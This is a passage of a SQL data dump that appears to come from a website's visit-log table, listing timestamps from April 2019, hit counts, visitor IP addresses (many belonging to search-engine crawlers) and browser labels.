08728,1,1,0,0,'193.106.30.98','chrome'),(414953,1556109028,1,1,0,0,'5.45.207.79','other'),(414954,1556109216,1,1,0,0,'91.196.178.169','chrome'),(414955,1556109257,2,2,0,0,'8.29.198.26','other'),(414956,1556110010,1,1,0,0,'157.55.39.202','other'),(414957,1556110083,1,1,0,0,'178.154.200.48','other'),(414958,1556110121,1,1,0,0,'5.45.207.79','other'),(414959,1556110220,1,1,0,0,'87.250.224.81','other'),(414960,1556110472,1,1,0,0,'178.154.171.27','other'),(414961,1556110793,1,1,0,0,'66.249.64.31','chrome'),(414962,1556110842,1,1,0,0,'178.154.244.11','other'),(414963,1556111481,1,1,0,0,'185.143.147.59','chrome'),(414964,1556112351,1,1,0,0,'94.45.57.102','chrome'),(414965,1556112392,1,1,0,0,'66.249.64.31','chrome'),(414966,1556112561,1,1,0,0,'66.249.64.58','chrome'),(414967,1556112733,1,1,0,0,'66.249.64.30','chrome'),(414968,1556112979,1,1,0,0,'40.77.167.132','other'),(414969,1556113255,1,1,0,0,'209.17.96.234','other'),(414970,1556113374,1,1,0,0,'157.55.39.142','other'),(414971,1556113548,1,1,0,0,'91.196.178.77','firefox'),(414972,1556113682,1,1,0,0,'91.196.178.87','chrome'),(414973,1556113705,1,1,0,0,'94.45.57.102','chrome'),(414974,1556114223,1,1,0,0,'87.250.224.47','other'),(414975,1556114227,1,1,0,0,'5.45.207.19','other'),(414976,1556114427,2,2,0,0,'157.55.39.203','other'),(414977,1556114540,1,1,0,0,'157.55.39.142','other'),(414978,1556114976,1,1,0,0,'193.106.30.98','chrome'),(414979,1556115156,1,1,0,0,'66.249.64.58','chrome'),(414980,1556115765,2,2,0,0,'157.55.39.203','other'),(414981,1556115826,1,1,0,0,'66.249.64.29','chrome'),(414982,1556116775,1,1,0,0,'207.46.13.239','other'),(414983,1556116786,1,1,0,0,'157.55.39.203','other'),(414984,1556117280,1,1,0,0,'5.45.207.19','other'),(414985,1556118228,1,1,0,0,'178.154.244.11','other'),(414986,1556118360,2,2,0,0,'5.45.207.79','other'),(414987,1556118659,1,1,0,0,'40.77.167.132','other'),(414988,1556118995,1,1,0,0,'157.55.39.142','other'),(414989,1556119529,1,1,0,0,'66.249.64.31','chrome'),(414990,1556120004,1,1,0,0,'31.130.17.30','chrome'),(414991,1556120104,1,1,0,0,'8.29.198.25','other'),(414992,1556120251,1,1,0,0,'8.29.198.27','other'),(414993,1556120389,1,1,0,0,'66.249.64.29','chrome'),(414994,1556121464,1,1,0,0,'66.249.64.29','chrome'),(414995,1556122626,1,1,0,0,'157.55.39.203','other'),(414996,1556122721,1,1,0,0,'5.188.210.44','chrome'),(414997,1556123006,1,1,0,0,'40.77.167.132','other'),(414998,1556123359,2,2,0,0,'66.249.64.29','chrome'),(414999,1556123460,1,1,0,0,'66.249.64.60','chrome'),(415000,1556124764,1,1,0,0,'157.55.39.203','other'),(415001,1556125144,1,1,0,0,'66.249.64.30','chrome'),(415002,1556125394,9,9,0,0,'176.37.80.245','other'),(415003,1556125695,1,1,0,0,'193.106.30.98','chrome'),(415004,1556125989,1,1,0,0,'157.55.39.203','other'),(415005,1556126117,1,1,0,0,'37.9.113.148','other'),(415006,1556126148,1,1,0,0,'87.250.224.47','other'),(415007,1556126313,2,2,0,0,'66.249.64.30','chrome'),(415008,1556126665,1,1,0,0,'66.249.64.29','chrome'),(415009,1556126715,1,1,0,0,'66.249.64.31','chrome'),(415010,1556127022,1,1,0,0,'157.55.39.203','other'),(415011,1556127031,1,1,0,0,'40.77.167.154','other'),(415012,1556127595,1,1,0,0,'66.249.64.30','chrome'),(415013,1556129371,1,1,0,0,'5.45.207.19','other'),(415014,1556130235,1,1,0,0,'40.77.167.16','other'),(415015,1556130426,1,1,0,0,'141.8.142.108','other'),(415016,1556130543,1,1,0,0,'157.55.39.203','other'),(415017,1556130943,2,2,0,0,'8.29.198.27','other'),(415018,1556131597,1,1,0,0,'193.106.30.98','chrome'),(415019,1556131873,1,1,0,0,'66.249.64.60','chrome'),(415020,1556133937,1,1,0,0,'66.249.64.31','chrome'),(415021,1556134193,1,1,0,0,'66.249.64.29','chrome'),(415022,1556134297,1,1,0,0,'194.44.118.158','chrome'),(415023,1556134677,1,1,0,0,'180.76.15.139','other'),(415024,1556134685,1,1,0,0,'157.55.39.203','other'),(415025,1556135013,2,2,0,0,'178.154.244.11','other'),(415026,1556135385,1,1,0,0,'188.163.5.20','chrome'),(415027,1556135580,1,1,0,0,'95.220.206.7','msie'),(415028,1556136225,1,1,0,0,'66.249.64.29','chrome'),(415029,1556136314,1,1,0,0,'66.249.64.60','chrome'),(415030,1556137167,1,1,0,0,'193.106.30.98','chrome'),(415031,1556137267,1,1,0,0,'40.77.167.16','other'),(415032,1556137929,1,1,0,0,'95.163.255.94','other'),(415033,1556138203,1,1,0,0,'5.45.207.19','other'),(415034,1556138251,2,2,0,0,'5.45.207.79','other'),(415035,1556138435,1,1,0,0,'40.77.167.16','other'),(415036,1556140678,1,1,0,0,'5.45.207.79','other'),(415037,1556140726,1,1,0,0,'178.154.244.11','other'),(415038,1556140867,1,1,0,0,'40.77.167.53','other'),(415039,1556141028,1,1,0,0,'207.46.13.122','other'),(415040,1556141110,1,1,0,0,'40.77.167.116','other'),(415041,1556141242,1,1,0,0,'40.77.167.151','other'),(415042,1556141250,1,0,1,0,'144.76.78.4',''),(415043,1556141804,2,2,0,0,'8.29.198.26','other'),(415044,1556141881,1,1,0,0,'66.249.64.30','chrome'),(415045,1556143284,1,1,0,0,'66.249.64.30','chrome'),(415046,1556144227,1,1,0,0,'66.249.64.60','chrome'),(415047,1556144502,1,1,0,0,'178.154.244.11','other'),(415048,1556146408,1,1,0,0,'66.249.64.29','chrome'),(415049,1556147243,1,1,0,0,'37.9.113.148','other'),(415050,1556147813,1,1,0,0,'178.154.244.11','other'),(415051,1556147823,1,1,0,0,'5.45.207.79','other'),(415052,1556148011,1,1,0,0,'66.249.64.58','chrome'),(415053,1556148466,2,2,0,0,'66.249.64.31','chrome'),(415054,1556148617,1,1,0,0,'207.46.13.122','other'),(415055,1556149132,1,1,0,0,'193.106.30.98','chrome'),(415056,1556149642,1,1,0,0,'180.76.15.11','other'),(415057,1556150248,1,1,0,0,'66.249.64.30','chrome'),(415058,1556151351,1,1,0,0,'95.108.213.4','other'),(415059,1556151378,1,1,0,0,'5.45.207.19','other'),(415060,1556152659,1,1,0,0,'8.29.198.26','other'),(415061,1556152769,1,1,0,0,'8.29.198.25','other'),(415062,1556153671,1,1,0,0,'66.249.64.31','chrome'),(415063,1556154644,2,2,0,0,'66.249.64.31','chrome'),(415064,1556154707,1,1,0,0,'66.249.64.30','chrome'),(415065,1556154820,1,1,0,0,'95.163.255.163','other'),(415066,1556155810,1,1,0,0,'157.55.39.246','other'),(415067,1556156757,1,1,0,0,'157.55.39.246','other'),(415068,1556157365,1,1,0,0,'5.188.210.44','chrome'),(415069,1556157799,1,1,0,0,'157.55.39.246','other'),(415070,1556157876,1,1,0,0,'197.231.221.211','chrome'),(415071,1556159054,1,1,0,0,'141.8.142.103','other'),(415072,1556159485,1,1,0,0,'87.250.224.47','other'),(415073,1556160007,4,4,0,0,'66.249.64.30','chrome'),(415074,1556160071,1,1,0,0,'66.249.64.29','chrome'),(415075,1556160991,1,1,0,0,'52.53.201.78','chrome'),(415076,1556161192,1,1,0,0,'193.106.30.98','chrome'),(415077,1556161231,1,1,0,0,'157.55.39.200','other'),(415078,1556161502,1,1,0,0,'40.77.167.38','other'),(415079,1556162136,2,2,0,0,'66.249.64.30','chrome'),(415080,1556163089,1,1,0,0,'95.163.255.92','other'),(415081,1556163507,2,2,0,0,'8.29.198.27','other'),(415082,1556163795,4,4,0,0,'95.216.0.38','other'),(415083,1556163914,1,1,0,0,'40.77.167.63','other'),(415084,1556164009,15,15,0,0,'198.204.244.90','other'),(415085,1556164715,1,1,0,0,'66.249.64.31','chrome'),(415086,1556165354,2,2,0,0,'34.221.158.236','chrome'),(415087,1556165842,1,1,0,0,'176.105.248.11','chrome'),(415088,1556166353,1,1,0,0,'66.249.64.31','chrome'),(415089,1556166356,1,1,0,0,'66.249.64.30','chrome'),(415090,1556166417,1,1,0,0,'66.249.64.60','chrome'),(415091,1556166670,1,1,0,0,'31.130.17.30','chrome'),(415092,1556167391,1,1,0,0,'95.163.255.176','other'),(415093,1556167471,1,1,0,0,'66.249.64.29','chrome'),(415094,1556167785,1,1,0,0,'193.106.30.98','chrome'),(415095,1556168879,1,1,0,0,'40.77.167.38','other'),(415096,1556168961,1,1,0,0,'178.154.244.11','other'),(415097,1556169080,1,1,0,0,'46.200.250.89','chrome'),(415098,1556169389,1,1,0,0,'95.163.255.95','other'),(415099,1556169746,1,1,0,0,'91.196.179.134','chrome'),(415100,1556169772,1,1,0,0,'207.46.13.76','other'),(415101,1556169980,1,1,0,0,'87.120.36.157','other'),(415102,1556170000,1,1,0,0,'62.149.15.172','chrome'),(415103,1556170324,1,1,0,0,'66.249.64.31','chrome'),(415104,1556170603,1,1,0,0,'178.154.244.65','other'),(415105,1556170816,1,1,0,0,'40.77.167.38','other'),(415106,1556171157,1,1,0,0,'141.8.142.103','other'),(415107,1556171556,1,1,0,0,'95.108.213.4','other'),(415108,1556172161,1,1,0,0,'66.249.64.60','chrome'),(415109,1556172467,1,1,0,0,'66.249.64.30','chrome'),(415110,1556172513,1,1,0,0,'40.77.167.158','other'),(415111,1556174216,1,1,0,0,'66.249.64.62','chrome'),(415112,1556174362,2,2,0,0,'8.29.198.26','other'),(415113,1556175043,1,1,0,0,'95.163.255.99','other'),(415114,1556175509,1,1,0,0,'95.163.255.92','other'),(415115,1556175553,1,1,0,0,'141.8.142.38','other'),(415116,1556176026,1,1,0,0,'193.106.30.98','chrome'),(415117,1556176587,1,1,0,0,'40.77.167.38','other'),(415118,1556177552,1,1,0,0,'66.249.64.30','chrome'),(415119,1556178196,1,1,0,0,'40.77.167.158','other'),(415120,1556178199,1,1,0,0,'78.111.186.37','chrome'),(415121,1556178384,1,1,0,0,'95.163.255.169','other'),(415122,1556179579,1,1,0,0,'91.196.179.134','chrome'),(415123,1556180337,1,1,0,0,'40.77.167.26','other'),(415124,1556180413,1,1,0,0,'193.106.30.98','chrome'),(415125,1556180700,1,1,0,0,'207.46.13.76','other'),(415126,1556180822,1,1,0,0,'91.196.178.87','chrome'),(415127,1556182638,2,2,0,0,'66.249.64.31','chrome'),(415128,1556182890,1,1,0,0,'207.46.13.76','other'),(415129,1556182936,1,1,0,0,'66.249.64.29','chrome'),(415130,1556184196,1,1,0,0,'66.249.64.30','chrome'),(415131,1556184412,1,1,0,0,'91.196.179.134','chrome'),(415132,1556184453,1,1,0,0,'5.188.210.44','chrome'),(415133,1556185044,2,2,0,0,'5.45.207.19','other'),(415134,1556185216,1,1,0,0,'8.29.198.26','other'),(415135,1556185289,1,1,0,0,'8.29.198.27','other'),(415136,1556185472,1,1,0,0,'194.44.109.20','chrome'),(415137,1556185551,1,1,0,0,'91.196.178.131','chrome'),(415138,1556185586,1,1,0,0,'91.196.179.134','chrome'),(415139,1556185589,1,1,0,0,'207.46.13.76','other'),(415140,1556185679,1,1,0,0,'40.77.167.26','other'),(415141,1556185726,1,1,0,0,'40.77.167.158','other'),(415142,1556185789,1,1,0,0,'66.249.64.58','chrome'),(415143,1556185989,2,2,0,0,'66.249.64.30','chrome'),(415144,1556186103,2,2,0,0,'178.154.244.11','other'),(415145,1556186119,1,1,0,0,'66.249.64.31','chrome'),(415146,1556186138,1,1,0,0,'141.8.142.103','other'),(415147,1556186168,1,1,0,0,'91.196.178.132','chrome'),(415148,1556186179,1,1,0,0,'93.78.184.148','chrome'),(415149,1556186222,1,1,0,0,'91.196.178.100','chrome'),(415150,1556186256,1,1,0,0,'66.249.64.62','chrome'),(415151,1556186538,1,1,0,0,'66.249.64.29','chrome'),(415152,1556186700,1,1,0,0,'193.106.30.98','chrome'),(415153,1556187147,1,1,0,0,'40.77.167.158','other'),(415154,1556187309,1,1,0,0,'109.74.154.72','chrome'),(415155,1556187589,1,1,0,0,'91.196.178.181','chrome'),(415156,1556187933,1,1,0,0,'66.249.64.31','chrome'),(415157,1556188321,1,1,0,0,'109.86.17.107','chrome'),(415158,1556188735,1,1,0,0,'40.77.167.38','other'),(415159,1556189365,1,1,0,0,'46.211.46.32','chrome'),(415160,1556189528,2,2,0,0,'66.249.64.31','chrome'),(415161,1556189662,1,1,0,0,'40.77.167.38','other'),(415162,1556190036,1,1,0,0,'66.249.64.29','chrome'),(415163,1556190114,1,1,0,0,'178.133.97.19','chrome'),(415164,1556190149,2,2,0,0,'207.46.13.76','other'),(415165,1556191171,1,1,0,0,'207.46.13.223','other'),(415166,1556191885,1,1,0,0,'40.77.167.157','other'),(415167,1556192551,1,1,0,0,'207.46.13.76','other'),(415168,1556192855,1,1,0,0,'213.180.203.40','other'),(415169,1556193397,1,1,0,0,'66.249.64.58','chrome'),(415170,1556193567,1,1,0,0,'193.106.30.98','chrome'),(415171,1556193655,1,1,0,0,'66.249.64.31','chrome'),(415172,1556195258,1,1,0,0,'66.249.64.60','chrome'),(415173,1556195518,1,1,0,0,'91.196.178.87','chrome'),(415174,1556195827,1,1,0,0,'40.77.167.26','other'),(415175,1556195828,2,2,0,0,'66.249.64.30','chrome'),(415176,1556196072,1,1,0,0,'8.29.198.25','other'),(415177,1556196132,1,1,0,0,'8.29.198.26','other'),(415178,1556196838,2,2,0,0,'66.249.64.31','chrome'),(415179,1556197148,1,1,0,0,'195.69.221.54','chrome'),(415180,1556197352,1,1,0,0,'66.249.64.30','chrome'),(415181,1556197357,1,1,0,0,'66.249.64.29','chrome'),(415182,1556198017,1,1,0,0,'207.46.13.223','other'),(415183,1556198321,1,1,0,0,'66.249.64.58','chrome'),(415184,1556199055,1,1,0,0,'91.196.178.87','chrome'),(415185,1556199314,1,1,0,0,'118.173.102.138','chrome'),(415186,1556199872,1,1,0,0,'141.8.142.103','other'),(415187,1556199914,83,83,0,0,'62.210.202.81','msie'),(415188,1556200167,1,1,0,0,'66.249.64.29','chrome'),(415189,1556200546,1,1,0,0,'66.249.64.60','chrome'),(415190,1556202835,2,2,0,0,'66.249.64.30','chrome'),(415191,1556204134,1,1,0,0,'193.93.12.154','chrome'),(415192,1556205047,1,1,0,0,'213.111.85.180','firefox'),(415193,1556205588,1,1,0,0,'207.46.13.223','other'),(415194,1556205661,1,1,0,0,'37.9.113.103','other'),(415195,1556205818,1,1,0,0,'40.77.167.157','other'),(415196,1556206596,1,1,0,0,'207.46.13.223','other'),(415197,1556206796,2,2,0,0,'40.77.167.26','other'),(415198,1556206918,1,1,0,0,'8.29.198.27','other'),(415199,1556206987,1,1,0,0,'8.29.198.26','other'),(415200,1556207234,1,1,0,0,'66.249.64.62','chrome'),(415201,1556208462,1,1,0,0,'207.46.13.223','other'),(415202,1556209439,1,1,0,0,'40.77.167.26','other'),(415203,1556210547,1,1,0,0,'5.45.207.19','other'),(415204,1556210590,1,1,0,0,'193.106.30.98','chrome'),(415205,1556212244,1,1,0,0,'207.46.13.223','other'),(415206,1556212447,1,1,0,0,'209.17.97.26','other'),(415207,1556212576,1,1,0,0,'40.77.167.26','other'),(415208,1556212734,1,1,0,0,'66.249.64.29','chrome'),(415209,1556213295,1,1,0,0,'207.46.13.76','other'),(415210,1556213383,3,3,0,0,'185.139.69.62','firefox'),(415218,1556213607,1,1,0,0,'141.8.142.103','other'),(415219,1556214430,1,1,0,0,'213.180.203.17','other'),(415220,1556214547,1,1,0,0,'213.180.203.40','other'),(415221,1556216069,1,1,0,0,'95.163.255.95','other'),(415222,1556216879,1,1,0,0,'95.163.255.94','other'),(415223,1556217497,1,1,0,0,'207.46.13.223','other'),(415224,1556217783,1,1,0,0,'8.29.198.26','other'),(415225,1556217830,1,1,0,0,'8.29.198.25','other'),(415226,1556218236,1,1,0,0,'40.77.167.157','other'),(415227,1556218340,3,3,0,0,'40.77.167.26','other'),(415228,1556219130,1,1,0,0,'37.9.113.103','other'),(415229,1556219169,1,1,0,0,'37.9.113.148','other'),(415230,1556219304,1,1,0,0,'87.250.224.64','other'),(415231,1556219307,1,1,0,0,'87.250.224.107','other'),(415232,1556219719,1,1,0,0,'207.46.13.223','other'),(415233,1556220313,1,1,0,0,'195.114.138.129','chrome'),(415234,1556220661,1,1,0,0,'5.45.207.79','other'),(415235,1556221210,1,1,0,0,'207.46.13.76','other'),(415236,1556222150,1,1,0,0,'95.163.255.158','other'),(415237,1556222168,1,1,0,0,'5.45.207.79','other'),(415238,1556222369,1,1,0,0,'178.154.244.11','other'),(415239,1556222643,1,1,0,0,'193.106.30.98','chrome'),(415240,1556222658,1,1,0,0,'5.45.207.19','other'),(415241,1556223358,1,1,0,0,'66.249.64.30','chrome'),(415242,1556223603,2,2,0,0,'141.8.142.103','other'),(415243,1556223631,2,2,0,0,'87.250.224.118','other'),(415244,1556223730,1,1,0,0,'213.180.203.17','other'),(415245,1556223805,1,1,0,0,'178.154.200.48','other'),(415246,1556224096,1,1,0,0,'95.220.209.64','msie'),(415247,1556224097,1,1,0,0,'5.18.108.57','msie'),(415248,1556225614,1,1,0,0,'40.77.167.157','other'),(415249,1556226027,1,1,0,0,'207.46.13.223','other'),(415250,1556226148,1,1,0,0,'95.163.255.162','other'),(415251,1556227997,1,1,0,0,'87.250.224.65','other'),(415252,1556228130,1,1,0,0,'95.108.181.75','other'),(415253,1556228352,1,1,0,0,'193.106.30.98','chrome'),(415254,1556228499,1,1,0,0,'213.180.203.40','other'),(415255,1556228586,1,1,0,0,'141.8.142.38','other'),(415256,1556228611,1,1,0,0,'141.8.142.144','other'),(415257,1556228630,2,2,0,0,'8.29.198.25','other'),(415258,1556229730,2,2,0,0,'66.249.64.29','chrome'),(415259,1556229956,1,1,0,0,'207.46.13.223','other'),(415260,1556230180,1,1,0,0,'209.17.97.74','other'),(415261,1556230260,1,1,0,0,'141.8.142.103','other'),(415262,1556231149,12,12,0,0,'207.46.13.223','other'),(415263,1556231167,4,4,0,0,'207.46.13.76','other'),(415264,1556231195,7,7,0,0,'40.77.167.157','other'),(415265,1556231824,1,1,0,0,'66.249.64.30','chrome'),(415266,1556232805,1,1,0,0,'207.46.13.223','other'),(415267,1556233232,1,1,0,0,'95.163.255.98','other'),(415268,1556233520,1,1,0,0,'180.76.15.26','other'),(415269,1556233645,2,2,0,0,'5.45.207.19','other'),(415270,1556234488,1,1,0,0,'89.163.242.241','opera'),(415271,1556235634,1,1,0,0,'207.46.13.223','other'),(415272,1556237854,1,1,0,0,'207.46.13.223','other'),(415273,1556238182,1,1,0,0,'178.154.200.8','other'),(415274,1556238320,1,1,0,0,'178.154.200.48','other'),(415275,1556238411,1,1,0,0,'37.9.113.20','other'),(415276,1556238908,1,1,0,0,'207.46.13.76','other'),(415277,1556239266,2,2,0,0,'40.77.167.26','other'),(415278,1556239477,1,1,0,0,'8.29.198.26','other'),(415279,1556239513,1,1,0,0,'8.29.198.27','other'),(415280,1556239841,1,1,0,0,'95.163.255.173','other'),(415281,1556240483,1,1,0,0,'193.106.30.98','chrome'),(415282,1556241140,1,1,0,0,'5.45.207.79','other'),(415283,1556241296,1,1,0,0,'18.237.109.97','other'),(415284,1556241897,1,1,0,0,'66.249.64.58','chrome'),(415285,1556242054,1,1,0,0,'72.13.36.80','other'),(415286,1556242369,1,1,0,0,'5.45.207.8','other'),(415287,1556242588,1,1,0,0,'141.8.142.108','other'),(415288,1556242835,1,1,0,0,'95.163.255.159','other'),(415289,1556243028,1,1,0,0,'180.76.15.30','other'),(415290,1556243142,1,1,0,0,'5.255.253.38','other'),(415291,1556243435,1,1,0,0,'141.8.142.144','other'),(415292,1556244002,1,1,0,0,'207.46.13.223','other'),(415293,1556244386,1,1,0,0,'95.163.255.194','other'),(415294,1556244418,1,1,0,0,'207.46.13.76','other'),(415295,1556244655,1,1,0,0,'40.77.167.26','other'),(415296,1556245368,1,1,0,0,'207.46.13.223','other'),(415297,1556245887,1,1,0,0,'66.249.64.29','chrome'),(415298,1556245919,1,1,0,0,'95.163.255.189','other'),(415299,1556246574,1,1,0,0,'95.163.255.93','other'),(415300,1556246677,1,1,0,0,'37.9.113.148','other'),(415301,1556247074,1,1,0,0,'141.8.132.16','other'),(415302,1556247180,1,1,0,0,'95.108.181.54','other'),(415303,1556247816,1,1,0,0,'40.77.167.26','other'),(415304,1556247851,2,2,0,0,'34.220.85.11','chrome'),(415305,1556248405,1,1,0,0,'207.46.13.76','other'),(415306,1556248603,1,1,0,0,'62.210.83.78','firefox'),(415307,1556249655,1,1,0,0,'66.249.64.31','chrome'),(415308,1556249895,1,1,0,0,'178.154.200.48','other'),(415309,1556250332,2,2,0,0,'8.29.198.26','other'),(415310,1556251731,1,1,0,0,'95.163.255.196','other'),(415311,1556251910,1,1,0,0,'213.180.203.9','other'),(415312,1556251931,1,1,0,0,'141.8.142.38','other'),(415313,1556252037,1,1,0,0,'37.9.113.103','other'),(415314,1556252793,1,1,0,0,'66.249.65.212','chrome'),(415315,1556252832,1,1,0,0,'66.249.65.216','chrome'),(415316,1556254439,1,1,0,0,'180.76.15.137','other'),(415317,1556255439,1,1,0,0,'46.166.137.201','other'),(415318,1556256590,1,1,0,0,'178.175.132.225','other'),(415319,1556256691,3,3,0,0,'5.45.207.19','other'),(415320,1556256894,1,1,0,0,'46.200.250.89','chrome'),(415321,1556257515,1,1,0,0,'207.46.13.76','other'),(415322,1556258357,1,1,0,0,'95.163.255.98','other'),(415323,1556258422,1,1,0,0,'95.163.255.96','other'),(415324,1556258536,1,1,0,0,'95.163.255.95','other'),(415325,1556258984,1,1,0,0,'91.196.178.87','chrome'),(415326,1556259305,1,1,0,0,'193.106.30.98','chrome'),(415327,1556259643,1,1,0,0,'66.249.65.212','chrome'),(415328,1556260519,1,1,0,0,'91.196.177.110','chrome'),(415329,1556260539,1,1,0,0,'42.236.10.78','other'),(415330,1556260576,1,1,0,0,'180.163.220.4','other'),(415331,1556260578,1,1,0,0,'42.236.10.117','other'),(415332,1556260632,3,3,0,0,'180.163.220.66','other'),(415333,1556260655,1,1,0,0,'180.163.220.3','other'),(415334,1556260975,1,1,0,0,'91.196.178.65','chrome'),(415335,1556261194,2,2,0,0,'8.29.198.26','other'),(415336,1556261356,1,1,0,0,'5.45.207.79','other'),(415337,1556261685,1,1,0,0,'180.76.15.9','other'),(415338,1556262007,1,1,0,0,'95.163.255.179','other'),(415339,1556262154,1,1,0,0,'141.8.142.191','other'),(415340,1556262285,1,1,0,0,'178.154.244.11','other'),(415341,1556262329,1,1,0,0,'66.249.65.216','chrome'),(415342,1556262755,1,1,0,0,'91.196.178.87','chrome'),(415343,1556262760,1,1,0,0,'66.249.73.7','chrome'),(415344,1556262864,1,1,0,0,'95.163.255.95','other'),(415345,1556263338,1,1,0,0,'178.154.244.11','other'),(415346,1556263380,1,1,0,0,'95.163.255.155','other'),(415347,1556263662,1,1,0,0,'5.45.207.79','other'),(415348,1556265364,1,1,0,0,'207.46.13.76','other'),(415349,1556265458,1,1,0,0,'193.106.30.98','chrome'),(415350,1556266159,1,1,0,0,'207.46.13.223','other'),(415351,1556266622,1,1,0,0,'213.180.203.17','other'),(415352,1556267050,1,1,0,0,'87.250.224.118','other'),(415353,1556267620,1,1,0,0,'5.255.253.25','other'),(415354,1556267795,1,1,0,0,'31.184.238.190','chrome'),(415355,1556267986,1,1,0,0,'207.46.13.223','other'),(415356,1556268390,1,1,0,0,'141.8.142.191','other'),(415357,1556268746,1,1,0,0,'46.200.250.89','chrome'),(415358,1556268880,1,1,0,0,'87.250.224.64','other'),(415359,1556271363,1,1,0,0,'193.106.30.98','chrome'),(415360,1556271593,1,1,0,0,'66.249.73.9','chrome'),(415361,1556272044,1,1,0,0,'8.29.198.27','other'),(415363,1556272046,1,1,0,0,'8.29.198.25','other'),(415364,1556273029,1,1,0,0,'31.184.238.248','chrome'),(415365,1556273754,1,1,0,0,'40.77.167.26','other'),(415366,1556274079,1,1,0,0,'109.74.154.72','chrome'),(415367,1556274293,1,1,0,0,'217.77.210.82','chrome'),(415368,1556274896,1,1,0,0,'40.77.167.26','other'),(415369,1556275146,1,1,0,0,'66.249.65.216','chrome'),(415370,1556275197,1,1,0,0,'5.165.243.47','chrome'),(415371,1556275200,1,1,0,0,'188.32.229.11','chrome'),(415372,1556275475,1,1,0,0,'91.196.177.46','firefox'),(415373,1556276041,1,1,0,0,'66.249.73.7','chrome'),(415374,1556276058,1,1,0,0,'95.163.255.97','other'),(415375,1556276346,1,1,0,0,'5.45.207.19','other'),(415376,1556276382,1,1,0,0,'141.8.142.108','other'),(415377,1556276717,1,1,0,0,'5.45.207.79','other'),(415378,1556276805,1,1,0,0,'40.77.167.26','other'),(415379,1556276848,1,1,0,0,'87.250.224.81','other'),(415380,1556277502,1,1,0,0,'207.46.13.76','other'),(415381,1556278134,1,1,0,0,'193.106.30.98','chrome'),(415382,1556278349,1,1,0,0,'5.45.207.19','other'),(415383,1556278701,1,1,0,0,'66.249.65.214','chrome'),(415384,1556278705,1,1,0,0,'66.249.65.212','chrome'),(415385,1556279939,1,1,0,0,'91.224.178.106','firefox'),(415386,1556280032,1,1,0,0,'180.76.15.150','other'),(415387,1556281607,2,2,0,0,'66.249.65.216','chrome'),(415388,1556282183,1,1,0,0,'91.209.11.236','other'),(415389,1556282373,1,1,0,0,'66.249.65.214','chrome'),(415390,1556282476,1,1,0,0,'93.185.213.56','chrome'),(415391,1556282901,1,1,0,0,'8.29.198.25','other'),(415392,1556282904,1,1,0,0,'8.29.198.27','other'),(415393,1556284190,4,4,0,0,'157.55.39.159','other'),(415394,1556284197,2,2,0,0,'157.55.39.158','other'),(415395,1556284200,2,2,0,0,'157.55.39.157','other'),(415396,1556284207,3,3,0,0,'157.55.39.161','other'),(415397,1556284281,1,1,0,0,'193.106.30.98','chrome'),(415398,1556284568,2,2,0,0,'5.45.207.79','other'),(415399,1556284919,3,3,0,0,'141.8.142.103','other'),(415400,1556284923,1,1,0,0,'178.154.244.11','other'),(415401,1556286208,1,1,0,0,'157.55.39.159','other'),(415402,1556286536,1,1,0,0,'5.45.207.19','other'),(415403,1556286739,1,1,0,0,'95.163.255.92','other'),(415404,1556288625,1,1,0,0,'66.249.73.9','chrome'),(415405,1556289482,1,1,0,0,'46.166.137.215','other'),(415406,1556289580,1,1,0,0,'180.76.15.152','other'),(415407,1556289764,1,1,0,0,'95.163.255.172','other'),(415408,1556290365,1,1,0,0,'66.249.65.214','chrome'),(415409,1556291372,1,1,0,0,'157.55.39.89','other'),(415410,1556291657,1,1,0,0,'66.249.73.5','chrome'),(415411,1556293756,1,1,0,0,'8.29.198.27','other'),(415412,1556293758,1,1,0,0,'8.29.198.25','other'),(415413,1556293790,1,1,0,0,'157.55.39.158','other'),(415414,1556293903,2,2,0,0,'157.55.39.182','other'),(415415,1556294262,1,1,0,0,'141.8.142.103','other'),(415416,1556295050,1,1,0,0,'157.55.39.158','other'),(415417,1556296006,1,1,0,0,'193.106.30.98','chrome'),(415418,1556297118,1,1,0,0,'157.55.39.182','other'),(415419,1556297776,1,1,0,0,'46.211.133.8','chrome'),(415420,1556298130,1,1,0,0,'157.55.39.157','other'),(415421,1556299308,1,1,0,0,'207.46.13.47','other'),(415422,1556299413,1,1,0,0,'91.196.178.187','chrome'),(415423,1556301890,1,1,0,0,'157.55.39.158','other'),(415424,1556301961,1,1,0,0,'141.8.142.103','other'),(415425,1556302419,1,1,0,0,'178.154.244.11','other'),(415426,1556303505,1,1,0,0,'157.55.39.158','other'),(415427,1556304011,2,2,0,0,'157.55.39.157','other'),(415428,1556304603,1,1,0,0,'8.29.198.27','other'),(415429,1556304607,1,1,0,0,'8.29.198.26','other'),(415430,1556304820,5,5,0,0,'66.249.73.5','chrome'),(415431,1556304908,2,2,0,0,'157.55.39.193','other'),(415432,1556305032,1,1,0,0,'95.163.255.169','other'),(415433,1556305678,1,1,0,0,'188.0.73.80','chrome'),(415434,1556306059,1,1,0,0,'207.46.13.123','other'),(415435,1556306658,1,1,0,0,'13.57.233.99','chrome'),(415436,1556306673,1,1,0,0,'141.8.142.103','other'),(415437,1556307708,1,1,0,0,'66.249.73.5','chrome'),(415438,1556307722,1,1,0,0,'66.249.73.9','chrome'),(415439,1556307762,1,1,0,0,'104.148.64.26','chrome'),(415440,1556308219,1,1,0,0,'207.46.13.53','other'),(415441,1556309328,1,1,0,0,'157.55.39.148','other'),(415442,1556310157,1,1,0,0,'157.55.39.225','other'),(415443,1556310368,1,1,0,0,'95.163.255.164','other'),(415444,1556310498,1,1,0,0,'157.55.39.148','other'),(415445,1556311104,1,1,0,0,'207.46.13.53','other'),(415446,1556311441,1,1,0,0,'46.166.137.215','other'),(415447,1556311565,1,1,0,0,'66.249.65.212','chrome'),(415448,1556311715,1,1,0,0,'178.154.244.11','other'),(415449,1556311927,1,1,0,0,'5.45.207.8','other'),(415450,1556312151,1,1,0,0,'95.163.255.97','other'),(415451,1556312230,1,1,0,0,'207.46.13.53','other'),(415452,1556312532,1,1,0,0,'87.250.224.65','other'),(415453,1556312644,1,1,0,0,'66.249.73.7','chrome'),(415454,1556313052,1,1,0,0,'157.55.39.148','other'),(415455,1556314204,1,1,0,0,'193.106.30.98','chrome'),(415456,1556314382,1,1,0,0,'157.55.39.225','other'),(415457,1556315442,1,1,0,0,'8.29.198.27','other'),(415458,1556315458,1,1,0,0,'8.29.198.26','other'),(415459,1556316116,1,1,0,0,'5.45.207.79','other'),(415460,1556316119,1,1,0,0,'5.45.207.19','other'),(415461,1556316826,1,1,0,0,'66.249.64.60','chrome'),(415462,1556317913,1,1,0,0,'95.163.255.92','other'),(415463,1556318737,1,1,0,0,'157.55.39.225','other'),(415464,1556318787,1,1,0,0,'157.